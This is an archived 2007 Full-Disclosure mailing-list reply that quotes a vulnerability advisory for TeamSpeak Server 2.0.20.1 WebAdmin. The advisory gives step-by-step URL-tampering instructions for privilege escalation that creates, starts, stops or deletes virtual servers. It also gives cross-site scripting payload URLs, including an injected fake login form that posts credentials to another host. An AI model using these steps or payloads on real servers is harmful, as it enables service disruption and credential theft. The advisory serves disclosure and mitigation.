[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities

To: "Gilberto Ficara" <g.ficara@xxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities
From: "Mads Behrendt Petersen" <mbp@xxxxxxxxxx>
Date: Fri, 11 May 2007 16:45:22 +0200

This isn't a software error, but a design flaw.
Don't give a registered user access to the webinterface, simple as that.

It's like the keyboard shortcuts to give SA to users

-----Oprindelig meddelelse-----
Fra: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] På vegne af Gilberto Ficara
Sendt: 11. maj 2007 15:53
Til: full-disclosure@xxxxxxxxxxxxxxxxx
Emne: [Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities

Hi everyone,
several months ago I discovered some vulnerabilities in TeamSpeak Server 
WebAdmin interface.

I sent the advisory and exploit to the developers about two months ago
(11 03 2007), but the server is still vulnerable, today.

Affected software: Teamspeak Server 2.0.20.1  

Looks like the beta build 2.0.23.15 isn't affected (or at least my exploit 
doesn't work on that).



1) Privilege escalation can lead to Service Abuse or Denial of Service 
=======================================================================

TeamSpeak server is based on a "site" and multiple "virtual servers".

On each "site" there are one or more SuperAdmin users that can manage the site 
configuration, adding more SuperAdmin users, adding, starting, stopping or 
removing virtual servers or even manage each single server, by selecting it 
from the web interface or the text-based one.

Each virtual server has one or more ServerAdmin users that can modify virtual 
server parameters (like the name), adding new users for the specified server 
(also new ServerAdmin users) and modify user privileges relative to that 
virtual server.

The problem lies on the RegisteredUser privileges configuration page:
in that page are listed privileges intended to be associated to the SuperAdmin 
role, like AdminAddServer or AdminStartServer. By activating these privileges 
for the RegisteredUsers role, loggin in with a new RegisteredUser account and 
doing some simple url tampering it is possible to CREATE, START, STOP and 
DELETE virtual servers to the site, without SuperAdmin access.

What is required:

- ServerAdmin access to the web interface

Here is a simple exploit pattern:

* As Server Admin with WebAdmin access:

- check AccessWebAdminServer, AdminAddServer, AdminDeleteServer,
  AdminStartServer, AdminStopServer privileges for Registered users
- create a new registered user
- logout


* As Registered User with WebAdmin access you can create a new 
  virtual server:

- login with the new account
- change the url to http://your_site:your_port/server_manager_add.html
- ADD NEW SERVER!!! (maybe you want to restrict codecs to get a usable
  default, like speex 12)
- change the url to
http://your_site:your_port/start_server.tscmd?serverid=N
  where N is the server ID (may require some guessing!)
- NOW THE SERVER IS ONLINE!!!
- Connect as ANONYMOUS to the server and ENJOY :)


* As Registered User with WebAdmin access you can **DELETE** 
  any existing virtual server:

- login with the new account
- change the url to
http://10.7.7.20:14534/ask_delete_server.tscmd?serverid=N
  where N is a number starting from 1
- if you click YES you can **DELETE** any virtual server


* As Registered User with WebAdmin access you can START or STOP
  any existing server:

- login as Registered User
- change the url to
http://your_site:your_port/start_server.tscmd?serverid=N
  to start any server
- change the url to
http://your_site:your_port/stop_server.tscmd?serverid=N
  to stop any server


2) Cross Site Scripting
========================

Pages ok_box.html and error_box.html are vulnerable to common Cross Site
Scripting attacks:

http://your_ts_server_here:14534/error_box.html?error_title=session
expired - please
login&error_text=<form action="http://127.0.0.1:31338/own.cgi";>User:
<input
type="text"><br>Pass: <input type="password"><br><br><input
type="submit"></form>&error_url=index.html

http://webadmin_uri:14534/ok_box.html?ok_title=%3Cscript%
3Ealert('hello')%3C/script%3E


Mitigation
==========

Disable WebAdmin access. 
Upgrade to beta release.



Gilberto Ficara

(sorry for my bad english :))

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities
  - From: Gilberto Ficara

Prev by Date: [Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities
Next by Date: [Full-disclosure] Mac OS X "ps(3)" and "top(3)" truncate output
Previous by thread: [Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities
Next by thread: [Full-disclosure] Mac OS X "ps(3)" and "top(3)" truncate output
Index(es):
- Date
- Thread